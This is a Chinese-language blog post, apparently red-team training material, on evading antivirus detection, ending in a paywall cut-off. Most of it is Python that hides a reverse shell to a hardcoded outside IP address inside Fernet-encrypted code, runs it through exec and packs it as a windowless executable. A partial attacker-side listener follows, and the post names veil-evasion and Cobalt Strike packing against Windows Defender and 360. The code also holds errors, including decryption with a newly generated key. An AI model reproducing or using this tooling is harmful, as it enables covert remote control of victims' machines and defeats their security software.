本文介绍了如何通过混淆、编码和反沙盒机制来避免杀毒软件的静态和动态检测。具体操作包括使用fernet加密shellcode、base64编码API调用、veil-evasion生成免杀payload以及对Cobalt Strike反弹shell进行加壳处理,以绕过Windows Defender和360检测。
本文作者:某学员A(红队培训班2期学员)
1、加密或编码或混淆过杀软静态检测
l 如下代码为实现payload经过fernet对称加密的shellcode生成器:
#coding:utf-8
#run by victim
from cryptography.fernet import Fernet
import os
payload=b'''
import socket, subprocess
remote_ip='8.129.211.1'
remote_port=12345
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect((remote_ip,remote_port))
while True:
data=s.recv(2048)
if data=='quit' or data=='exit' or data=='': break
result=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
s.send(result.stdout.read()+result.stderr.read())
s.close()
'''
print('Now, Encrypting......')
fernet1=Fernet(Fernet.generate_key())
encoded_payload=fernet1.encrypt(bytes(payload))
file1=open('shellcode.py','w+')
file1.write('from cryptography.fernet import Fernet'+'\n'+
'fernet1=Fernet(Fernet.generate_key())'+'\n'+
'encoded_payload='+encoded_payload+'\n'+
'exec(fernet1.decrypt(encoded_payload))')
file1.close()
print('Encryption Complete.')
print('Now, Compiling......')
os.system('pyinstaller -F shellcode.py --noconsole')
print('Compile Complete.')
#run by hacker
'''
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
local_ip=''
local_port=12345
s.bind((local_ip, local_port))
s.listen(20)
print('Listening...')
(conn, addr)=s.accept()
print('Connected by
最低0.47元/天 解锁文章
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
